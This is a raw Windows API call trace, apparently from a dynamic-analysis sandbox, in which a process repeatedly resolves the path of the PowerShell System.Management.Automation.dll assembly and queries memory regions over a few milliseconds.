	[0285.628] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.629] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.629] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.629] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.629] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.630] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.630] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.631] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.631] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.631] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.631] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bc80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.632] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.632] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.633] VirtualQuery (in: lpAddress=0x26b1b0, lpBuffer=0x26c070, dwLength=0x30 | out: lpBuffer=0x26c070*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.633] VirtualQuery (in: lpAddress=0x26b240, lpBuffer=0x26c100, dwLength=0x30 | out: lpBuffer=0x26c100*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26b8c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c590, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c4b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.634] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c720, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.635] VirtualQuery (in: lpAddress=0x26bc50, lpBuffer=0x26cb10, dwLength=0x30 | out: lpBuffer=0x26cb10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c360, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26bec0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0285.638] VirtualQuery (in: lpAddress=0x26bc50, lpBuffer=0x26cb10, dwLength=0x30 | out: lpBuffer=0x26cb10*(BaseAddress=0x26b000, AllocationBase=0x1f0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0285.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x26c410, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
